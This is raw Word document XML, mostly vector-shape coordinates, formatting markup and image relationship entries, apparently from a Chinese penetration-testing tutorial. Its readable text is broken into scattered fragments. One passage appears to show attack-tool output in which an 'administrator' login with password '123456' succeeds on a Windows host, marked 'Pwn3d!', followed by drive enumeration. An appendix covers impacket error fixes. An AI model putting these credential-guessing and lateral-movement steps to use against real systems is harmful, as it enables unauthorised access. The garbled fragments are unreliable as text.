2051,4856,2051,4856,2051,4856,2051,4856,2051,4856,2052,4856,2052,4856,2052,4856,2052,4856,2053,4856,2053,4856,2053,4856,2054,4856,2054,4856,2055,4856,2055,4856,2055,4856,2056,4856,2057,4856,2057,4856,2058,4856,2058,4856,2059,4856,2060,4856,2060,4856,2061,4856,2062,4856,2063,4856,2064,4856,2065,4856,2066,4856,2067,4856,2068,4856,2069,4856,2070,4856,2071,4856,2073,4856,2074,4856,2075,4856,2077,4856,2078,4856,2080,4856,2081,4856,2083,4856,2084,4856,2086,4856,2088,4856,2090,4856,2092,4856,2094,4856,2096,4856,2098,4856,2100,4856,2102,4856,2104,4856,2107,4856,2109,4856,2111,4856,2114,4856,2116,4856,2119,4856,2122,4856,2125,4856,2128,4856,2130,4856,2134,4856,2137,4856,2140,4856,2143,4856,2146,4856,2150,4856,2153,4856,2157,4856,2160,4856,2164,4856,2168,4856,2172,4856,2176,4856,2180,4856,2184,4856,2188,4856,2193,4856,2197,4856,2201,4856,2206,4856,2211,4856,2215,4856,2220,4856,2225,4856,2230,4856,2236,4856,2241,4856,2246,4856,2252,4856,2257,4856,2263,4856,2268,4856,2274,4856,2280,4856,2286,4856,2293,4856,2299,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4856,2305,4855,2305,4855,2305,4855,2305,4855,2305,4855,2305,4855,2305,4855,2305,4854,2305,4854,2305,4854,2305,4854,2305,4853,2305,4853,2305,4853,2305,4853,2305,4852,2305,4852,2305,4852,2305,4851,2305,4851,2305,4850,2305,4850,2305,4850,2305,4849,2305,4849,2305,4848,2305,4848,2305,4847,2305,4846,2305,4846,2305,4845,2305,4845,2305,4844,2305,4843,2305,4843,2305,4842,2305,4841,2305,4840,2305,4839,2305,4839,2305,4838,2305,4837,2305,4836,2305,4835,2305,4834,2305,4833,2305,4832,2305,4831,2305,4830,2305,4829,2305,4828,2305,4826,2305,4825,2305,4824,2305,4823,2305,4821,2305,4820,2305,4819,2305,4817,2305,4816,2305,4814,2305,4813,2305,4811,2305,4810,2305,4808,2305,4806,2305,4805,2305,4803,2305,4801,2305,4799,2305,4797,2305,4795,2305,4793,2305,4791,2305,4789,2305,4787,2305,4785,2305,4783,2305,4781,2305,4779,2305,4776,2305,4774,2305,4772,2305,4769,2305,4767,2305,4764,2305,4762,2305,4759,2305,4756,2305,4754,2305,4751,2305,4748,2305,4745,2305,4742,2305,4739,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2305,4736,2304,4736,2304,4736,2304,4736,2304,4736,2304,4736,2304,4736,2303,4736,2303,4736,2303,4736,2302,4736,2302,4736,2302,4736,2301,4736,2301,4736,2301,4736,2300,4736,2300,4736,2299,4736,2299,4736,2298,4736,2297,4736,2297,4736,2296,4736,2295,4736,2295,4736,2294,4736,2293,4736,2292,4736,2291,4736,2290,4736,2289,4736,2288,4736,2287,4736,2286,4736,2285,4736,2284,4736,2283,4736,2281,4736,2280,4736,2279,4736,2277,4736,2276,4736,2274,4736,2272,4736,2271,4736,2269,4736,2267,4736,2265,4736,2264,4736,2262,4736,2260,4736,2258,4736,2255,4736,2253,4736,2251,4736,2249,4736,2246,4736,2244,4736,2241,4736,2239,4736,2236,4736,2233,4736,2231,4736,2228,4736,2225,4736,2222,4736,2219,4736,2215,4736,2212,4736,2209,4736,2205,4736,2202,4736,2198,4736,2195,4736,2191,4736,2187,4736,2183,4736,2179,4736,2175,4736,2171,4736,2167,4736,2163,4736,2158,4736,2154,4736,2149,4736,2144,4736,2140,4736,2135,4736,2130,4736,2125,4736,2120,4736,2114,4736,2109,4736,2104,4736,2098,4736,2092,4736,2087,4736,2081,4736,2075,4736,2069,4736,2063,4736,2056,4736,2050e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:120.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,2410" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:2410;width:130;height:270" coordorigin="4710,2410" coordsize="130,270" path="m4736,2425l4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4736,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4737,2425,4738,2425,4738,2425,4738,2425,4738,2425,4738,2425,4739,2425,4739,2425,4739,2425,4739,2425,4739,2425,4740,2425,4740,2425,4740,2425,4741,2425,4741,2425,4741,2425,4742,2425,4742,2425,4742,2425,4743,2425,4743,2425,4744,2425,4744,2425,4745,2425,4745,2425,4746,2425,4746,2425,4747,2425,4748,2425,4748,2425,4749,2425,4750,2425,4750,2425,4751,2425,4752,2425,4753,2425,4753,2425,4754,2425,4755,2425,4756,2425,4757,2425,4758,2425,4759,2425,4760,2425,4761,2425,4762,2425,4763,2425,4764,2425,4765,2425,4766,2425,4768,2425,4769,2425,4770,2425,4772,2425,4773,2425,4774,2425,4776,2425,4777,2425,4779,2425,4780,2425,4782,2425,4783,2425,4785,2425,4787,2425,4788,2425,4790,2425,4792,2425,4794,2425,4796,2425,4797,2425,4799,2425,4801,2425,4803,2425,4806,2425,4808,2425,4810,2425,4812,2425,4814,2425,4817,2425,4819,2425,4821,2425,4824,2425,4826,2425,4829,2425,4831,2425,4834,2425,4836,2425,4839,2425,4842,2425,4845,2425,4848,2425,4850,2425,4853,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2425,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2426,4856,2427,4856,2427,4856,2427,4856,2427,4856,2428,4856,2428,4856,2428,4856,2429,4856,2429,4856,2429,4856,2430,4856,2430,4856,2431,4856,2431,4856,2432,4856,2432,4856,2433,4856,2434,4856,2434,4856,2435,4856,2436,4856,2436,4856,2437,4856,2438,4856,2439,4856,2440,4856,2441,4856,2442,4856,2443,4856,2444,4856,2445,4856,2447,4856,2448,4856,2449,4856,2450,4856,2452,4856,2453,4856,2455,4856,2456,4856,2458,4856,2460,4856,2461,4856,2463,4856,2465,4856,2467,4856,2469,4856,2471,4856,2473,4856,2475,4856,2477,4856,2479,4856,2482,4856,2484,4856,2487,4856,2489,4856,2492,4856,2494,4856,2497,4856,2500,4856,2503,4856,2506,4856,2509,4856,2512,4856,2515,4856,2518,4856,2522,4856,2525,4856,2528,4856,2532,4856,2536,4856,2539,4856,2543,4856,2547,4856,2551,4856,2555,4856,2559,4856,2563,4856,2568,4856,2572,4856,2577,4856,2581,4856,2586,4856,2591,4856,2596,4856,2600,4856,2606,4856,2611,4856,2616,4856,2621,4856,2627,4856,2632,4856,2638,4856,2644,4856,2650,4856,2655,4856,2662,4856,2668,4856,2674,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4856,2680,4855,2680,4855,2680,4855,2680,4855,2680,4855,2680,4855,2680,4855,2680,4854,2680,4854,2680,4854,2680,4854,2680,4853,2680,4853,2680,4853,2680,4853,2680,4852,2680,4852,2680,4852,2680,4851,2680,4851,2680,4850,2680,4850,2680,4850,2680,4849,2680,4849,2680,4848,2680,4848,2680,4847,2680,4846,2680,4846,2680,4845,2680,4845,2680,4844,2680,4843,2680,4843,2680,4842,2680,4841,2680,4840,2680,4839,2680,4839,2680,4838,2680,4837,2680,4836,2680,4835,2680,4834,2680,4833,2680,4832,2680,4831,2680,4830,2680,4829,2680,4828,2680,4826,2680,4825,2680,4824,2680,4823,2680,4821,2680,4820,2680,4819,2680,4817,2680,4816,2680,4814,2680,4813,2680,4811,2680,4810,2680,4808,2680,4806,2680,4805,2680,4803,2680,4801,2680,4799,2680,4797,2680,4795,2680,4793,2680,4791,2680,4789,2680,4787,2680,4785,2680,4783,2680,4781,2680,4779,2680,4776,2680,4774,2680,4772,2680,4769,2680,4767,2680,4764,2680,4762,2680,4759,2680,4756,2680,4754,2680,4751,2680,4748,2680,4745,2680,4742,2680,4739,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2680,4736,2679,4736,2679,4736,2679,4736,2679,4736,2679,4736,2679,4736,2678,4736,2678,4736,2678,4736,2677,4736,2677,4736,2677,4736,2676,4736,2676,4736,2675,4736,2675,4736,2674,4736,2674,4736,2673,4736,2673,4736,2672,4736,2671,4736,2671,4736,2670,4736,2669,4736,2668,4736,2667,4736,2667,4736,2666,4736,2665,4736,2664,4736,2663,4736,2661,4736,2660,4736,2659,4736,2658,4736,2657,4736,2655,4736,2654,4736,2652,4736,2651,4736,2649,4736,2648,4736,2646,4736,2644,4736,2642,4736,2641,4736,2639,4736,2637,4736,2635,4736,2633,4736,2631,4736,2628,4736,2626,4736,2624,4736,2621,4736,2619,4736,2616,4736,2614,4736,2611,4736,2609,4736,2606,4736,2603,4736,2600,4736,2597,4736,2594,4736,2591,4736,2587,4736,2584,4736,2581,4736,2577,4736,2574,4736,2570,4736,2566,4736,2562,4736,2559,4736,2555,4736,2551,4736,2546,4736,2542,4736,2538,4736,2533,4736,2529,4736,2524,4736,2520,4736,2515,4736,2510,4736,2505,4736,2500,4736,2495,4736,2490,4736,2484,4736,2479,4736,2473,4736,2468,4736,2462,4736,2456,4736,2450,4736,2444,4736,2438,4736,2432,4736,2425e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:239.400pt;width:467.400pt;height:189.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId41" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:489.600pt;width:297.600pt;height:97.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId42" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:668.400pt;width:249.600pt;height:37.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId43" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:755.400pt;width:7.200pt;height:6.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId44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86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35" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="4550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.6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5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BMI9HGC42S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+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5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BMI9HGC42S\administrator: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123456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Pwn3d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!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)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4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9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.6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5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BMI9HGC42S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9898"/>
          <w:spacing w:val="15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+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Enumerated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disks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9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.6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5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BMI9HGC42S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C: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9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.6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5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BMI9HGC42S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D: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7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9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.6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5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BMI9HGC42S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E:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="330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附录：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22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>解决出现：STATUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_PIPE_DISCONNECTED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79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改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>成经典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48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解决出现错误：UnicodeDecod</w:t>
      </w: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eError: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升级imp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acket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7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5" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr</w:t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opoor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	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg" />
	<Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/18.jpeg" />
	<Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/19.jpeg" />
	<Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/20.jpeg" />
	<Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/21.jpeg" />
	<Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/22.jpeg" />
	<Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/23.jpeg" />
	<Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/24.jpeg" />
	<Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/25.jpeg" />
	<Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/26.jpeg" />
	<Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/27.jpeg" />
	<Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/28.jpeg" />
	<Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/29.jpeg" />
	<Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/30.jpeg" />
	<Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/31.jpeg" />
	<Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/32.jpeg" />
	<Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/33.jpeg" />
	<Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/34.jpeg" />
	<Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/35.jpeg" />
	<Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/36.jpeg" />
	<Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/37.jpeg" />
	<Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/38.jpeg" />
	<Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/39.jpeg" />
	<Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/40.jpeg" />
	<Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/41.jpeg" />
	<Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/42.jpeg" />
	<Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/43.jpeg" />
	<Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/44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